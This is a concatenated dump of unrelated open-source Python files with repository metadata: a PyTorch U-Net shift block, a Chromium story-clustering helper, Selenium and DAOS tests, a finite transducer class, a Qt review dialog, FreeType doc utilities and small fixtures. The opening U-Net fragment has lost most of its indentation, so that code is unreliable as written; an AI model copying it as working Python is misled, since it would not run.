unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, input_nc=None, submodule=unet_shift_block,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
unet_block = UnetSkipConnectionBlock(output_nc, ngf, input_nc=input_nc, submodule=unet_block, outermost=True,
norm_layer=norm_layer, use_spectral_norm=use_spectral_norm)
self.model = unet_block
def forward(self, input):
return self.model(input)
# Note: the TripleBlock differs in its `upconv` definition.
# 'cos' means that we add an `innerCos` layer in the block.
class ResPatchSoftUnetSkipConnectionShiftTriple(nn.Module):
def __init__(self, outer_nc, inner_nc, opt, innerCos_list, shift_list, mask_global, input_nc, \
submodule=None, shift_layer=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d,
use_spectral_norm=False, layer_to_last=3):
super(ResPatchSoftUnetSkipConnectionShiftTriple, self).__init__()
self.outermost = outermost
if input_nc is None:
input_nc = outer_nc
downconv = spectral_norm(nn.Conv2d(input_nc, inner_nc, kernel_size=4,
stride=2, padding=1), use_spectral_norm)
downrelu = nn.LeakyReLU(0.2, True)
downnorm = norm_layer(inner_nc)
uprelu = nn.ReLU(True)
upnorm = norm_layer(outer_nc)
        # As the downconv layer takes outer_nc in and gives inner_nc out,
        # the shift is defined like this:
shift = InnerResPatchSoftShiftTriple(inner_nc, opt.shift_sz, opt.stride, opt.mask_thred,
opt.triple_weight, opt.fuse, layer_to_last=layer_to_last)
shift.set_mask(mask_global)
shift_list.append(shift)
# Add latent constraint
# Then add the constraint to the constrain layer list!
innerCos = InnerCos(strength=opt.strength, skip=opt.skip, layer_to_last=layer_to_last)
innerCos.set_mask(mask_global) # Here we need to set mask for innerCos layer too.
innerCos_list.append(innerCos)
# Different position only has differences in `upconv`
# for the outermost, the special is `tanh`
if outermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downconv]
up = [uprelu, upconv, nn.Tanh()]
model = down + [submodule] + up
# for the innermost, the special is `inner_nc` instead of `inner_nc*2`
elif innermost:
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc, outer_nc,
kernel_size=4, stride=2,
padding=1), use_spectral_norm)
down = [downrelu, downconv] # for the innermost, no submodule, and delete the bn
up = [uprelu, upconv, upnorm]
model = down + up
# else, the normal
else:
# Res shift differs with other shift here. It is `*2` not `*3`.
upconv = spectral_norm(nn.ConvTranspose2d(inner_nc * 2, outer_nc,
kernel_size=4, stride=2,
                                                      padding=1), use_spectral_norm)
down = [downrelu, downconv, downnorm]
            # The shift should be placed after uprelu.
            # NB: innerCos is placed before shift, so the latent gradient is
            # added to the former part.
up = [uprelu, innerCos, shift, upconv, upnorm]
model = down + [submodule] + up
self.model = nn.Sequential(*model)
def forward(self, x):
if self.outermost: # if it is the outermost, directly pass the input in.
return self.model(x)
else:
x_latter = self.model(x)
_, _, h, w = x.size()
if h != x_latter.size(2) or w != x_latter.size(3):
x_latter = F.interpolate(x_latter, (h, w), mode='bilinear')
return torch.cat([x_latter, x], 1) # cat in the C channel
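# --- Illustrative sketch (added for exposition; not part of the original file).
# All the blocks above share one side-effect pattern: each constructed shift /
# InnerCos layer is appended to a caller-owned list, so training code can push
# a new mask to every registered layer at once. A minimal stand-in:
def _demo_registration_pattern():
    class _Recorder(object):
        def __init__(self, registry):
            registry.append(self)
            self.mask = None
        def set_mask(self, mask):
            self.mask = mask
    shift_list = []
    layers = [_Recorder(shift_list) for _ in range(3)]
    new_mask = object()
    for layer in shift_list:        # one pass updates every registered layer
        layer.set_mask(new_mask)
    assert all(layer.mask is new_mask for layer in layers)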
| 54.62543
| 175
| 0.572157
|
54b0ec65bf9dd231312d4d73918ce870ff9e22b4
| 2,270
|
py
|
Python
|
tools/perf/experimental/story_clustering/similarity_calculator.py
|
zealoussnow/chromium
|
fd8a8914ca0183f0add65ae55f04e287543c7d4a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 14,668
|
2015-01-01T01:57:10.000Z
|
2022-03-31T23:33:32.000Z
|
tools/perf/experimental/story_clustering/similarity_calculator.py
|
zealoussnow/chromium
|
fd8a8914ca0183f0add65ae55f04e287543c7d4a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 113
|
2015-05-04T09:58:14.000Z
|
2022-01-31T19:35:03.000Z
|
tools/perf/experimental/story_clustering/similarity_calculator.py
|
zealoussnow/chromium
|
fd8a8914ca0183f0add65ae55f04e287543c7d4a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 5,941
|
2015-01-02T11:32:21.000Z
|
2022-03-31T16:35:46.000Z
|
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from core.external_modules import pandas
HIGHEST_VALID_NAN_RATIO = 0.5
def CalculateDistances(
input_dataframe,
metric,
normalize=False,
output_path=None):
"""Calculates the distances of stories.
If normalize flag is set the values are first normalized using min-max
normalization. Then the similarity measure between every two stories is
calculated using pearson correlation.
Args:
input_dataframe: A dataframe containing a list of records
having (test_case, commit_pos, bot, value).
metric: String containing name of the metric.
normalize: A flag to determine if normalization is needed.
output_path: Path to write the calculated distances.
Returns:
A dataframe containing the distance matrix of the stories.
"""
input_by_story = input_dataframe.groupby('test_case')['value']
total_values_per_story = input_by_story.size()
nan_values_per_story = input_by_story.apply(lambda s: s.isna().sum())
should_keep = nan_values_per_story < (
total_values_per_story * HIGHEST_VALID_NAN_RATIO)
valid_stories = total_values_per_story[should_keep].index
filtered_dataframe = input_dataframe[
input_dataframe['test_case'].isin(valid_stories)]
temp_df = filtered_dataframe.copy()
if normalize:
# Min Max normalization
grouped = temp_df.groupby(['bot', 'test_case'])['value']
min_value = grouped.transform('min')
max_value = grouped.transform('max')
temp_df['value'] = temp_df['value'] / (1 + max_value - min_value)
distances = pandas.DataFrame()
grouped_temp = temp_df.groupby(temp_df['bot'])
for _, group in grouped_temp:
sample_df = group.pivot(index='commit_pos', columns='test_case',
values='value')
if distances.empty:
distances = 1 - sample_df.corr(method='pearson')
else:
distances = distances.add(1 - sample_df.corr(method='pearson'),
fill_value=0)
if output_path is not None:
if not os.path.isdir(output_path):
os.makedirs(output_path)
distances.to_csv(
os.path.join(output_path, metric + '_distances.csv')
)
return distances
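# --- Illustrative sketch (added for exposition; not part of the original
# file). It mimics the core of CalculateDistances on a tiny hand-made frame:
# pivot to (commit_pos x test_case), then take 1 - Pearson correlation, so
# two perfectly correlated stories end up at distance ~0.
def _demo_story_distance():
    frame = pandas.DataFrame({
        'test_case': ['a'] * 4 + ['b'] * 4,
        'commit_pos': [1, 2, 3, 4] * 2,
        'bot': ['linux'] * 8,
        'value': [1.0, 2.0, 3.0, 4.0, 2.0, 4.0, 6.0, 8.0],
    })
    wide = frame.pivot(index='commit_pos', columns='test_case', values='value')
    distances = 1 - wide.corr(method='pearson')
    assert abs(distances.loc['a', 'b']) < 1e-9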
| 31.527778
| 73
| 0.730837
|
293283969ca712299812e4876596c140604d7076
| 1,898
|
py
|
Python
|
web/tests/chatlocation.py
|
gopherkhan/playhvz
|
77a399c4d5da33f33681cb927b3f476d27a7d538
|
[
"Apache-2.0"
] | null | null | null |
web/tests/chatlocation.py
|
gopherkhan/playhvz
|
77a399c4d5da33f33681cb927b3f476d27a7d538
|
[
"Apache-2.0"
] | null | null | null |
web/tests/chatlocation.py
|
gopherkhan/playhvz
|
77a399c4d5da33f33681cb927b3f476d27a7d538
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TODO: High-level file comment."""
import sys
def main(argv):
pass
if __name__ == '__main__':
main(sys.argv)
import setup
from selenium.webdriver.common.by import By
driver = setup.MakeDriver(user="moldavi")
if driver.is_mobile:
# Moldavi shares his location
driver.DrawerMenuClick('mobile-main-page', 'Global Chat')
driver.Click([[By.TAG_NAME, 'ghvz-chat-location'], [By.TAG_NAME, 'paper-icon-button']])
driver.RetryUntil(
lambda : True,
lambda: driver.FindElement([[By.NAME, 'map-ready']]))
driver.Click([[By.ID, 'sendLocationForm'], [By.ID, 'done']])
# NOTE: don't blindly copy this, it's very risky to use FindElement's return value.
location = driver.FindElement([[By.NAME, 'message-Global Chat-'], [By.ID, 'mapContainer']])
location = location.get_attribute('src')
assert "https://maps.googleapis.com/maps/api/staticmap" in location;
# Jack can see it
driver.SwitchUser('jack')
driver.DrawerMenuClick('mobile-main-page', 'Global Chat')
# NOTE: don't blindly copy this, it's very risky to use FindElement's return value.
location = driver.FindElement([[By.NAME, 'message-Global Chat-'], [By.ID, 'mapContainer']])
location = location.get_attribute('src')
assert "https://maps.googleapis.com/maps/api/staticmap" in location;
driver.Quit()
| 34.509091
| 93
| 0.721812
|
45e533457e46ae262573048136e4c016fa8a386f
| 5,496
|
py
|
Python
|
src/tests/ftest/nvme/nvme_pool_extend.py
|
kalfizah/daos
|
32125564af7382b5a9924649a49b95013553e101
|
[
"BSD-2-Clause-Patent"
] | 2
|
2021-07-14T12:21:50.000Z
|
2021-07-14T12:21:52.000Z
|
src/tests/ftest/nvme/nvme_pool_extend.py
|
kalfizah/daos
|
32125564af7382b5a9924649a49b95013553e101
|
[
"BSD-2-Clause-Patent"
] | null | null | null |
src/tests/ftest/nvme/nvme_pool_extend.py
|
kalfizah/daos
|
32125564af7382b5a9924649a49b95013553e101
|
[
"BSD-2-Clause-Patent"
] | 1
|
2021-11-03T05:00:42.000Z
|
2021-11-03T05:00:42.000Z
|
#!/usr/bin/python3
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import time
import threading
from test_utils_pool import TestPool
from osa_utils import OSAUtils
from write_host_file import write_host_file
from dmg_utils import check_system_query_status
from apricot import skipForTicket
class NvmePoolExtend(OSAUtils):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
NVME Pool Extend test cases.
- Start the few daos servers.
- Create a pool
- Run IOR with write mode
- Start a new server and extend the pool
- Verify IOR written data after extending the pool.
:avocado: recursive
"""
def setUp(self):
"""Set up for test case."""
super().setUp()
self.dmg_command = self.get_dmg_command()
self.daos_command = self.get_daos_command()
self.ior_test_sequence = self.params.get("ior_test_sequence",
'/run/ior/iorflags/*')
# Start an additional server.
self.extra_servers = self.params.get("test_servers",
"/run/extra_servers/*")
# Recreate the client hostfile without slots defined
self.hostfile_clients = write_host_file(
self.hostlist_clients, self.workdir, None)
self.pool = None
self.dmg_command.exit_status_exception = True
def run_nvme_pool_extend(self, num_pool, oclass=None):
"""Run Pool Extend
Args:
num_pool (int) : total pools to create for testing purposes.
oclass (str) : object class (eg: RP_2G8,etc)
Defaults to None.
"""
pool = {}
total_servers = len(self.hostlist_servers) * 2
self.log.info("Total Daos Servers (Initial): %d", total_servers)
if oclass is None:
oclass = self.ior_cmd.dfs_oclass.value
for val in range(0, num_pool):
# Create a pool
pool[val] = TestPool(self.context, dmg_command=self.dmg_command)
pool[val].get_params(self)
pool[val].create()
pool[val].set_property("reclaim", "disabled")
# On each pool (max 3), extend the ranks
# eg: ranks : 4,5 ; 6,7; 8,9.
for val in range(0, num_pool):
self.pool = pool[val]
test = self.ior_test_sequence[val]
threads = []
threads.append(threading.Thread(target=self.run_ior_thread,
kwargs={"action": "Write",
"oclass": oclass,
"test": test}))
# Launch the IOR threads
for thrd in threads:
self.log.info("Thread : %s", thrd)
thrd.start()
time.sleep(1)
self.pool.display_pool_daos_space("Pool space: Beginning")
pver_begin = self.get_pool_version()
# Start the additional servers and extend the pool
if val == 0:
self.log.info("Extra Servers = %s", self.extra_servers)
self.start_additional_servers(self.extra_servers)
# Check the system map extra servers are in joined state.
for retry in range(0, 10):
scan_info = self.get_dmg_command().system_query()
if not check_system_query_status(scan_info):
if retry == 9:
self.fail("One/More servers status not correct")
else:
break
self.log.info("Pool Version at the beginning %s", pver_begin)
# Extend ranks (4,5), (6,7), (8,9)
ranks_extended = "{},{}".format((val * 2) + 4, (val * 2) + 5)
output = self.dmg_command.pool_extend(self.pool.uuid,
ranks_extended)
self.print_and_assert_on_rebuild_failure(output)
pver_extend = self.get_pool_version()
self.log.info("Pool Version after extend %s", pver_extend)
# Check pool version incremented after pool extend
self.assertTrue(pver_extend > pver_begin,
"Pool Version Error: After extend")
# Wait to finish the threads
for thrd in threads:
thrd.join()
if not self.out_queue.empty():
self.assert_on_exception()
# Verify the data after pool extend
self.run_ior_thread("Read", oclass, test)
# Get the pool space at the end of the test
display_string = "Pool{} space at the End".format(val)
self.pool.display_pool_daos_space(display_string)
self.container = self.pool_cont_dict[self.pool][0]
kwargs = {"pool": self.pool.uuid,
"cont": self.container.uuid}
output = self.daos_command.container_check(**kwargs)
self.log.info(output)
@skipForTicket("DAOS-7195")
def test_nvme_pool_extend(self):
"""Test ID: DAOS-2086
Test Description: NVME Pool Extend
:avocado: tags=all,full_regression
:avocado: tags=hw,large
:avocado: tags=nvme,checksum,nvme_osa
:avocado: tags=nvme_pool_extend
"""
self.run_nvme_pool_extend(3)
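# --- Illustrative sketch (added for exposition; not part of the original file).
# The rank arithmetic in run_nvme_pool_extend maps the pool index `val` to the
# pair of newly started server ranks being extended.
def _demo_rank_pairs():
    pairs = ["{},{}".format((val * 2) + 4, (val * 2) + 5) for val in range(3)]
    assert pairs == ["4,5", "6,7", "8,9"]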
| 40.711111
| 76
| 0.562955
|
3d8ce35a772bc2cf07a117f030588c75f13ae519
| 5,083
|
py
|
Python
|
cp4/nft.py
|
thomas-franceschi/theory-project-pied-piper
|
a55ea764e8f0624f1f085ee589a7688be33eb892
|
[
"MIT"
] | null | null | null |
cp4/nft.py
|
thomas-franceschi/theory-project-pied-piper
|
a55ea764e8f0624f1f085ee589a7688be33eb892
|
[
"MIT"
] | null | null | null |
cp4/nft.py
|
thomas-franceschi/theory-project-pied-piper
|
a55ea764e8f0624f1f085ee589a7688be33eb892
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import collections
def strip_comments(file):
"""Remove comments. Everything from // to the end of the line is
considered a comment."""
for line in file:
try:
i = line.index("//")
line = line[:i]
except ValueError:
pass
yield line.strip()
class NFT(object):
"""Nondeterministic finite automaton."""
# This creates a mini-subclass NFT.Transition with three attributes
Transition = collections.namedtuple('Transition', ['q', 'a', 'b', 'r'])
# Special name for empty string
EPSILON = '&'
def __init__(self):
self.states = set() # States
self.start = None # Start state
self.accept = set() # Accept states
self.transitions = set() # Transitions
self.transitions_from = {} # Transitions indexed by q
self.transitions_on = {} # Transitions indexed by a
def set_start(self, q):
"""Set the start state."""
self.states.add(int(q))
self.start = int(q)
def add_accept(self, q):
"""Add an accept state."""
self.states.add(int(q))
self.accept.add(int(q))
def add(self, t):
"""Add a transition (of type NFT.Transition)."""
self.states.update([int(t.q), int(t.r)])
self.transitions.add(t)
self.transitions_from.setdefault(t.q, set()).add(t)
self.transitions_on.setdefault(t.a, set()).add(t)
def add_transition(self, q, a, b, r):
"""Add a transition (specified by a 'from' state, a symbol, and a 'to'
state)."""
self.add(self.Transition(int(q), a, b, int(r)))
@classmethod
def read(cls, file):
"""Read a NFT from a file."""
f = strip_comments(file)
m = cls()
# Internally, we renumber all the states. This is not so good
# for readability but is sometimes more convenient.
states = next(f).split()
state_index = {q:i for (i,q) in enumerate(states)}
_ = next(f) # ignore alphabet
m.set_start(state_index[next(f)])
for q in next(f).split(): m.add_accept(state_index[q])
for line in f:
q, a, b, r = line.split()
m.add_transition(state_index[q], a, b, state_index[r])
return m
def write(self, file):
"""Write a NFT to a file."""
file.write(' '.join(map(str, self.states)) + '\n')
alphabet = set(t.a for t in self.transitions if t.a != self.EPSILON)
file.write(' '.join(map(str, alphabet)) + '\n')
file.write(str(self.start) + '\n')
file.write(' '.join(map(str, self.accept)) + '\n')
for t in self.transitions:
file.write("{} {} {} {}\n".format(t.q, t.a, t.b, t.r))
def any_path(m):
"""Returns a path from the start state to an accept state, or raises
ValueError if there is none."""
if m.start in m.accept: return []
# Breadth-first search
agenda = collections.deque()
visited = set()
for t in m.transitions_from.get(m.start, []):
agenda.append([t])
visited.add(t.r)
while len(agenda) > 0:
path = agenda.popleft()
q = path[-1].r
if q in m.accept:
return path
for t in m.transitions_from.get(q, []):
if t.r not in visited:
agenda.append(path+[t])
visited.add(t.r)
#raise ValueError('no path')
return False
    def is_empty(m):
        """Returns true iff an NFT recognizes the empty language."""
        # any_path returns False (rather than raising) when no path exists;
        # an empty path [] is still a valid path, so compare with `is False`.
        return m.any_path() is False
@classmethod
def singleton(cls, w):
"""Returns a NFT that recognizes {w}."""
m = cls()
m.set_start(0)
for i,a in enumerate(w):
m.add_transition(i, a, a, i+1)
m.add_accept(len(w))
return m
@classmethod
def compose(cls, m1, m2):
"""Compose two finite transducers."""
ee = cls.EPSILON
def q(q1, q2): return q1*len(m2.states)+q2
m = cls()
m.set_start(q(m1.start,m2.start))
for a in m1.transitions_on:
for t1 in m1.transitions_on[a]:
if t1.b != ee:
for t2 in m2.transitions_on.get(t1.b, []):
m.add_transition(q(t1.q,t2.q), t1.a,t2.b, q(t1.r,t2.r))
else:
for q2 in m2.states:
m.add_transition(q(t1.q,q2), t1.a,ee, q(t1.r,q2))
for q1 in m1.states:
for t2 in m2.transitions_on.get(ee, []):
m.add_transition(q(q1,t2.q), ee,t2.b, q(q1,t2.r))
for q1 in m1.accept:
for q2 in m2.accept:
m.add_accept(q(q1,q2))
return m
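# --- Illustrative sketch (added for exposition; not part of the original file).
# compose() pairs up states via q(q1, q2) = q1 * len(m2.states) + q2 and
# chains outputs into inputs: a machine rewriting a->b composed with one
# rewriting b->c yields a machine rewriting a->c.
def _demo_compose():
    m1 = NFT()
    m1.set_start(0)
    m1.add_accept(1)
    m1.add_transition(0, 'a', 'b', 1)   # reads a, writes b
    m2 = NFT()
    m2.set_start(0)
    m2.add_accept(1)
    m2.add_transition(0, 'b', 'c', 1)   # reads b, writes c
    m = NFT.compose(m1, m2)
    assert any(t.a == 'a' and t.b == 'c' for t in m.transitions)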
if __name__ == "__main__":
    infile = open('../examples/sipser-t1.nft')
    nft = NFT.read(infile)
    nft.write(open('text.txt', 'w'))
| 33.662252
| 79
| 0.531969
|
7abd25c628276de8c16b9db594c5fc4293100a32
| 1,983
|
py
|
Python
|
test/test_equipment_shared_io_module_ref.py
|
sdnit-se/intersight-python
|
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
|
[
"Apache-2.0"
] | 21
|
2018-03-29T14:20:35.000Z
|
2021-10-13T05:11:41.000Z
|
test/test_equipment_shared_io_module_ref.py
|
sdnit-se/intersight-python
|
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
|
[
"Apache-2.0"
] | 14
|
2018-01-30T15:45:46.000Z
|
2022-02-23T14:23:21.000Z
|
test/test_equipment_shared_io_module_ref.py
|
sdnit-se/intersight-python
|
551f7685c0f76bb8af60ec83ffb6f9672d49a4ae
|
[
"Apache-2.0"
] | 18
|
2018-01-03T15:09:56.000Z
|
2021-07-16T02:21:54.000Z
|
# coding: utf-8
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. # noqa: E501
The version of the OpenAPI document: 1.0.9-1295
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import intersight
from intersight.models.equipment_shared_io_module_ref import EquipmentSharedIoModuleRef # noqa: E501
from intersight.rest import ApiException
class TestEquipmentSharedIoModuleRef(unittest.TestCase):
"""EquipmentSharedIoModuleRef unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testEquipmentSharedIoModuleRef(self):
"""Test EquipmentSharedIoModuleRef"""
# FIXME: construct object with mandatory attributes with example values
# model = intersight.models.equipment_shared_io_module_ref.EquipmentSharedIoModuleRef() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 52.184211
| 1,052
| 0.787695
|
ccb461d21492ff537b91c0014522db556d24ea4b
| 2,079
|
py
|
Python
|
Lib/site-packages/hackedit/vendor/qcrash/_dialogs/review.py
|
fochoao/cpython
|
3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9
|
[
"bzip2-1.0.6",
"0BSD"
] | 30
|
2016-02-07T20:23:29.000Z
|
2022-02-23T08:44:25.000Z
|
Lib/site-packages/hackedit/vendor/qcrash/_dialogs/review.py
|
fochoao/cpython
|
3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9
|
[
"bzip2-1.0.6",
"0BSD"
] | 20
|
2021-05-03T18:02:23.000Z
|
2022-03-12T12:01:04.000Z
|
Lib/site-packages/hackedit/vendor/qcrash/_dialogs/review.py
|
fochoao/cpython
|
3dc84b260e5bced65ebc2c45c40c8fa65f9b5aa9
|
[
"bzip2-1.0.6",
"0BSD"
] | 5
|
2017-12-26T03:36:50.000Z
|
2020-12-10T07:09:14.000Z
|
"""
This module contains the review dialog.
"""
from qcrash.qt import QtCore, QtGui, QtWidgets
from qcrash._forms import dlg_review_ui
class DlgReview(QtWidgets.QDialog):
"""
Dialog for reviewing the final report.
"""
def __init__(self, content, log, parent, window_icon):
"""
:param content: content of the final report, before review
:param parent: parent widget
"""
super(DlgReview, self).__init__(parent)
self.ui = dlg_review_ui.Ui_Dialog()
self.ui.setupUi(self)
self.ui.tabWidget.setCurrentIndex(0)
self.ui.edit_main.setPlainText(content)
self.ui.edit_main.installEventFilter(self)
self.ui.edit_log.installEventFilter(self)
self.setWindowFlags(self.windowFlags() & ~QtCore.Qt.WindowContextHelpButtonHint)
self.setWindowIcon(
QtGui.QIcon.fromTheme('document-edit')
if window_icon is None else window_icon)
if log:
self.ui.edit_log.setPlainText(log)
else:
self.ui.tabWidget.tabBar().hide()
self.ui.edit_main.setFocus()
def eventFilter(self, obj, event):
interesting_objects = [self.ui.edit_log, self.ui.edit_main]
if obj in interesting_objects and event.type() == QtCore.QEvent.KeyPress:
if event.key() == QtCore.Qt.Key_Return and \
event.modifiers() & QtCore.Qt.ControlModifier:
self.accept()
return True
return False
@classmethod
def review(cls, content, log, parent, window_icon): # pragma: no cover
"""
Reviews the final bug report.
:param content: content of the final report, before review
:param parent: parent widget
        :returns: a (report content, log) tuple, or (None, None) if the
            review was canceled.
"""
dlg = DlgReview(content, log, parent, window_icon)
if dlg.exec_():
return dlg.ui.edit_main.toPlainText(), \
dlg.ui.edit_log.toPlainText()
return None, None
| 35.237288
| 88
| 0.623377
|
c69609583fc057f8425c08dff4fd056557e8cd27
| 3,640
|
py
|
Python
|
src/tools/docmaker/utils.py
|
hsmith/freetype
|
a1d3c0c8522cb703b5bdc6b3bff13d27819ef1ec
|
[
"FTL"
] | null | null | null |
src/tools/docmaker/utils.py
|
hsmith/freetype
|
a1d3c0c8522cb703b5bdc6b3bff13d27819ef1ec
|
[
"FTL"
] | null | null | null |
src/tools/docmaker/utils.py
|
hsmith/freetype
|
a1d3c0c8522cb703b5bdc6b3bff13d27819ef1ec
|
[
"FTL"
] | null | null | null |
#
# utils.py
#
# Auxiliary functions for the `docmaker' tool (library file).
#
# Copyright 2002-2016 by
# David Turner.
#
# This file is part of the FreeType project, and may only be used,
# modified, and distributed under the terms of the FreeType project
# license, LICENSE.TXT. By continuing to use, modify, or distribute
# this file you indicate that you have read the license and
# understand and accept it fully.
import string, sys, os, glob, itertools
# current output directory
#
output_dir = None
# A function that generates a sorting key. We want lexicographical order
# (primary key) except that capital letters are sorted before lowercase
# ones (secondary key).
#
# The primary key is implemented by lowercasing the input. The secondary
# key is simply the original data appended, character by character. For
# example, the sort key for `FT_x' is `fFtT__xx', while the sort key for
# `ft_X' is `fftt__xX'. Since ASCII codes of uppercase letters are
# numerically smaller than the codes of lowercase letters, `fFtT__xx' gets
# sorted before `fftt__xX'.
#
def index_key( s ):
return string.join( itertools.chain( *zip( s.lower(), s ) ) )
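# Example (added note): with string.join's default separator, index_key('FT_x')
# actually yields 'f F t T _ _ x x' -- the spaces are interleaved uniformly,
# so the relative ordering matches the 'fFtT__xx' key described above.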
# Sort `input_list', placing the elements of `order_list' in front.
#
def sort_order_list( input_list, order_list ):
new_list = order_list[:]
for id in input_list:
if not id in order_list:
new_list.append( id )
return new_list
# Divert standard output to a given project documentation file. Use
# `output_dir' to determine the filename location if necessary and save the
# old stdout handle in a tuple that is returned by this function.
#
def open_output( filename ):
global output_dir
if output_dir and output_dir != "":
filename = output_dir + os.sep + filename
old_stdout = sys.stdout
new_file = open( filename, "w" )
sys.stdout = new_file
return ( new_file, old_stdout )
# Close the output that was returned by `open_output'.
#
def close_output( output ):
output[0].close()
sys.stdout = output[1]
# Check output directory.
#
def check_output():
global output_dir
if output_dir:
if output_dir != "":
if not os.path.isdir( output_dir ):
sys.stderr.write( "argument"
+ " '" + output_dir + "' "
+ "is not a valid directory\n" )
sys.exit( 2 )
else:
output_dir = None
def file_exists( pathname ):
"""Check that a given file exists."""
result = 1
try:
file = open( pathname, "r" )
file.close()
except:
result = None
sys.stderr.write( pathname + " couldn't be accessed\n" )
return result
def make_file_list( args = None ):
"""Build a list of input files from command-line arguments."""
file_list = []
# sys.stderr.write( repr( sys.argv[1 :] ) + '\n' )
if not args:
args = sys.argv[1:]
for pathname in args:
if string.find( pathname, '*' ) >= 0:
newpath = glob.glob( pathname )
newpath.sort() # sort files -- this is important because
# of the order of files
else:
newpath = [pathname]
file_list.extend( newpath )
if len( file_list ) == 0:
file_list = None
else:
# now filter the file list to remove non-existing ones
file_list = filter( file_exists, file_list )
return file_list
# eof
| 28.4375
| 76
| 0.609341
|
a9d66431865481d1e6ad001911f47523ebed8a20
| 1,503
|
py
|
Python
|
Chapter 2/Code/CurrentWeather.py
|
professor-li/book-dow-iot-projects
|
5b2b16459298a6503b87c17ac550e635299aa945
|
[
"MIT"
] | 17
|
2018-05-26T13:00:57.000Z
|
2021-11-11T09:07:18.000Z
|
Chapter 2/Code/CurrentWeather.py
|
professor-li/book-dow-iot-projects
|
5b2b16459298a6503b87c17ac550e635299aa945
|
[
"MIT"
] | null | null | null |
Chapter 2/Code/CurrentWeather.py
|
professor-li/book-dow-iot-projects
|
5b2b16459298a6503b87c17ac550e635299aa945
|
[
"MIT"
] | 16
|
2018-05-14T09:04:41.000Z
|
2021-11-11T09:07:22.000Z
|
class CurrentWeather:
weather_data={
'Toronto':['13','partly sunny','8 km/h NW'],
'Montreal':['16','mostly sunny','22 km/h W'],
'Vancouver':['18','thunder showers','10 km/h NE'],
'New York':['17','mostly cloudy','5 km/h SE'],
'Los Angeles':['28','sunny','4 km/h SW'],
'London':['12','mostly cloudy','8 km/h NW'],
'Mumbai':['33','humid and foggy','2 km/h S']
}
def __init__(self, city):
self.city = city
def getTemperature(self):
return self.weather_data[self.city][0]
def getWeatherConditions(self):
return self.weather_data[self.city][1]
def getWindSpeed(self):
return self.weather_data[self.city][2]
def getCity(self):
return self.city
if __name__ == "__main__":
currentWeather = CurrentWeather('New York')
wind_dir_str_len = 2
if currentWeather.getWindSpeed()[-2:-1] == ' ':
wind_dir_str_len = 1
print("The current temperature in", currentWeather.getCity(),"is",
currentWeather.getTemperature(), "degrees Celsius,",
"the weather conditions are",
currentWeather.getWeatherConditions(),
"and the wind is coming out of the",
currentWeather.getWindSpeed()[-(wind_dir_str_len):],
"direction with a speed of",
currentWeather.getWindSpeed()
[0:len(currentWeather.getWindSpeed())-(wind_dir_str_len)]
)
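# Worked example of the slicing above (using the 'New York' data): the wind
# string is '5 km/h SE'; its last wind_dir_str_len characters ('SE') are the
# direction, and the remaining prefix '5 km/h ' is the speed portion.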
| 31.978723
| 70
| 0.575516
|
20edc8d26ce51ade1716d76add7bb7ecad15daed
| 502
|
py
|
Python
|
fixtures/models/login.py
|
spoon03/moodle_ui_test
|
550bc52fa69d32a9d377df0378f46430e8692c59
|
[
"Apache-2.0"
] | null | null | null |
fixtures/models/login.py
|
spoon03/moodle_ui_test
|
550bc52fa69d32a9d377df0378f46430e8692c59
|
[
"Apache-2.0"
] | null | null | null |
fixtures/models/login.py
|
spoon03/moodle_ui_test
|
550bc52fa69d32a9d377df0378f46430e8692c59
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import annotations
from faker import Faker
fake = Faker("Ru-ru")
class LoginData:
"""Методы для страницы логина."""
def __init__(self, login=None, password=None):
self.login = login
self.password = password
@staticmethod
def random() -> LoginData:
"""
Рандомизатор данных для логина.
:return:
"""
login = fake.email()
password = fake.password()
return LoginData(login=login, password=password)
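# Illustrative usage (added sketch; not part of the original fixture):
if __name__ == "__main__":
    creds = LoginData.random()
    print(creds.login, creds.password)   # fake email / password from Faker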
| 22.818182
| 56
| 0.615538
|
8b0c8ac2f300406acee508e986a72810121d3088
| 1,571
|
py
|
Python
|
python3/icecreamstand.py
|
eiadshahtout/Python
|
b2406b0806bc55a9d8f5482a304a8d6968249018
|
[
"MIT"
] | null | null | null |
python3/icecreamstand.py
